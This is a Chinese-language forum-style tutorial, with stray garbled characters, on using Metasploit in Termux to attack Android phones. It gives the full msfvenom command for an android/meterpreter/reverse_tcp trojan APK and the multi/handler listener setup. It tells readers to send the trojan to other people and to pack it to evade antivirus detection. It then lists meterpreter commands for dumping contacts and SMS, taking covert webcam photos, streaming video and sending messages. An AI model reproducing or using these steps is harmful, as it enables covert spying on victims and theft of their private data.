眾所周知,msf是大家公認的神器圈驼!
現(xiàn)在我就來說說到底怎么用msf呢
有很多人說聋丝,他們不會安裝msfconsole
教程:
http://bbs.huluxia.com/wap/thread/829605.html?para=37Hftt%2B137bfsd%2B037Xfst%2B03p%2FfuN%2By37nftt%2Bw37U%3D%0A&product=tool
安裝了msfconsole之后,在termux輸入:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=5555 R > /sdcard/mu.apk
其中
LHOST= 后面的數(shù)字是本地的ip朱监,不是被攻擊者的ip而是你自己的
LPORT= 是端口势告,高端口不容易被報毒蛇捌,如果你不知道端口是什么那就不要改了
生成的木馬在根目錄的mu.apk(啰嗦)
那么接下來,我來教大家怎么監(jiān)聽吧
1.啟動msfconsole(漫長):msfconsole
2.使用multi模塊:use exploit/multi/handler
3.設置LHOST(跟木馬的一樣):set LHOST 192.168.2.117
4.設置LPORT(一樣的):set LPORT 5555
5.設置payload:set payload android/meterpreter/reverse_tcp
6.啟動監(jiān)聽:exploit
最后將木馬發(fā)給別人就行啦
很多人說一看就知道是木馬了咱台!
在這里我說一句络拌,你不會加個殼嘛?
ok回溺!當魚上吊的時候春贸,會反彈shell
命令:
dump_contacts 導出電話
dump_sms 導出信息
webcam_list 列出攝像頭
webcam_stream 開啟攝像
webcam_snap 偷拍一張照片
webcam_chat 視頻通話
ps 列出所有進程
activity_start 啟動其它應用
check_root 檢查是否root
send_sms 發(fā)送指定信息
全部手機進行混萝,免root進行